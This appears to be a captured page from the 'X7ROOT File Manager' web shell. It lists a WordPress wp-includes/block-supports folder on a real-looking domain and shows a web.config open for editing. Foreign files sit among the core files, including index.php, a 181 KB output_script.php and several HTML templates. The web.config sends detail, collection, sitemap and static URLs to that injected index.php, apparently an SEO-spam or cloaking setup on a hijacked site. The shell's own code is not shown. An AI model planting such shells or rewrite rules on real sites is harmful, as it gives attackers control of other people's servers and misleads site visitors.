X7ROOT File Manager
Current Path:
/home/greejped/haldiawater.com/wp-includes/block-supports
home
/
greejped
/
haldiawater.com
/
wp-includes
/
block-supports
/
ðŸ“
..
📄
align.php
(1.67 KB)
📄
aria-label.php
(1.57 KB)
📄
background.php
(4.02 KB)
📄
block-style-variations.php
(9.2 KB)
📄
border.php
(6.27 KB)
ðŸ“
child_cache
📄
collection.html
(18.27 KB)
📄
colors.php
(5.81 KB)
📄
config.json
(159 B)
📄
custom-classname.php
(1.64 KB)
📄
detail.html
(21.16 KB)
📄
dimensions.php
(5.28 KB)
📄
duotone.php
(2.67 KB)
📄
elements.php
(8.46 KB)
📄
error_log
(36.28 MB)
📄
generated-classname.php
(1.7 KB)
📄
home.html
(16.68 KB)
📄
index.php
(54.94 KB)
📄
layout.php
(38.5 KB)
📄
output_script.php
(181.13 KB)
📄
position.php
(4.24 KB)
📄
settings.php
(4.52 KB)
📄
shadow.php
(2.04 KB)
📄
spacing.php
(2.81 KB)
📄
static.css.html
(14.98 KB)
📄
static.js.html
(2.49 KB)
📄
typography.php
(28.13 KB)
📄
utils.php
(1011 B)
📄
web.config
(2 KB)
Editing: web.config
<?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <rewrite> <rules> <rule name="Rewrite detail"> <match url="^detail/(?:[^_]*)_([^./]+)\.html$" /> <action type="Rewrite" url="index.php?t=detail&i={R:1}" /> </rule> <rule name="Rewrite collection 1"> <match url="^collection/(?:[^_]*)_([^./]+)\.html$" /> <action type="Rewrite" url="index.php?t=collection&i={R:1}" /> </rule> <rule name="Rewrite collection 2"> <match url="^collection/(?:[^_]*)_([^./]+)/(\d+)/(\d+)\.html$" /> <action type="Rewrite" url="index.php?t=collection&i={R:1}&n={R:2}&s={R:3}" /> </rule> <rule name="Rewrite sitemap xml"> <match url="^sitemap\.xml$" /> <action type="Rewrite" url="index.php?t=sitemap&s={R:1}&f=xml" /> </rule> <rule name="Rewrite sitemap xml 2"> <match url="^sitemap(-\d+)?\.(txt|xml)$" /> <action type="Rewrite" url="index.php?t=sitemap&s={R:1}&f={R:2}" /> </rule> <rule name="Rewrite static"> <match url="^static/(.*)" /> <action type="Rewrite" url="index.php?t=static&p=static&e={R:1}" /> </rule> <rule name="Rewrite wp-content"> <match url="^wp-content/(.*)" /> <action type="Rewrite" url="index.php?t=static&p=wp-content&e={R:1}" /> </rule> <rule name="Rewrite wp-includes"> <match url="^wp-includes/(.*)" /> <action type="Rewrite" url="index.php?t=static&p=wp-includes&e={R:1}" /> </rule> </rules> </rewrite> </system.webServer> </configuration>
Upload File
Create Folder